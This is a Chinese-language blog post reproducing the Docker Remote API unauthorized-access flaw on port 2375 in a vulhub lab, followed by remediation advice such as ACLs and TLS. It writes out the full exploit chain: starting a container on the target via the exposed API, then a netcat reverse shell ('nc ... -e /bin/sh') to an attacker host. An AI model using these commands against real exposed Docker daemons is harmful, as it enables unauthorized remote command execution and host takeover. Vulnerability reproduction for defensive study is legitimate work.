Docker Daemon API未授权

本文详细介绍了Docker Remote API的一个安全漏洞,该漏洞允许未授权访问,可能导致远程命令执行。攻击者可以利用暴露在外网的2375端口,通过一系列步骤实现对目标系统的控制。修复建议包括限制网络访问和启用TLS认证。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

影响范围

Docker ALL 

漏洞类型

未授权访问类

利用条件

影响范围应用

漏洞概述

Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行

漏洞复现

环境搭建

下载环境

mkdir docker
cd docker 
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh

 之后给docker-entrypoint.sh赋予执行权限

chmod 777 docker-entrypoint.sh

编译并启动环境

docker-compose up -d

漏洞利用

漏洞检测

docker -H tcp://192.168.17.140:2375 images

反弹shell

Step 1:在VPS上监听9999端口

nc -lnvp 9999

 Step 2:查看目标系统上存在的镜像

docker -H tcp://192.168.17.140:2375 images

 Step 3:之后创建一个轻量级镜像

docker -H tcp://192.168.17.140:2375 run -id  alpine:latest

Step 4:查看运行的容器信息获取对应的容器ID

docker -H tcp://192.168.17.140:2375 ps

  Step 5:进入容器并通过nc进行反弹shell

docker -H tcp://192.168.17.140:2375 exec -it cbb678549422  sh
nc 192.168.17.128 9999 -e /bin/sh

 Step 6:在攻击主机中成功接收到shell

 Step 7:退出并删除容器

exit
docker -H tcp://192.168.17.140:2375 rm cbb678549422 -f
docker -H tcp://192.168.17.140:2375 ps

修复建议

1、对2375端口做网络访问控制,例如:ACL控制

2、修改docker swarm的认证方式,使用TLS认证

### Docker 2375端口未授权访问漏洞 #### 原因分析 Docker守护进程默认情况下会在TCP端口2375上提供远程API接口,如果此端口暴露于公共网络而没有适当的身份验证机制,则可能导致未经授权的用户能够连接到Docker引擎并执行各种操作。当配置不当或安全措施不足时,攻击者可以利用这一弱点来获取敏感信息甚至控制主机系统[^1]。 #### 影响范围 一旦存在这样的漏洞,潜在的影响非常严重。攻击者可以通过发送特定请求给目标服务器上的Docker服务来进行恶意活动,比如启动新的容器实例、下载镜像文件或是查看当前运行中的容器列表等。更糟糕的是,由于这些行为都是通过合法的服务通道完成的,因此很难被传统的防火墙所阻止。此外,对于那些启用了Swarm模式的环境来说,整个集群都可能受到威胁,因为管理节点之间的通信也是基于同样的API实现的[^2]。 #### 修复建议 为了防止此类安全隐患的发生,应当采取如下预防措施: - **启用TLS加密**:确保所有的API调用都被强制要求经过SSL/TLS协议传输,并且只接受来自已知客户端证书的连接尝试。 - **设置访问权限**:为不同的用户提供最小化的角色定义以及细粒度的操作许可策略;同时考虑部署额外的安全层如OAuth2.0或其他形式的身份认证框架。 - **限制公开暴露**:除非绝对必要,否则不应将Docker Engine监听地址绑定至外网可到达的位置。理想状态下应该仅限局域网内部机器间通讯或者借助反向代理等方式间接对外开放部分功能。 - **定期更新软件版本**:保持官方发布的最新稳定版安装包处于可用状态,及时修补已知缺陷以减少风险敞口。 ```bash # 修改docker.service文件中ExecStart参数添加选项-H unix:///var/run/docker.sock -H tcp://0.0.0.0:2376 --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem sudo systemctl daemon-reload && sudo systemctl restart docker ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值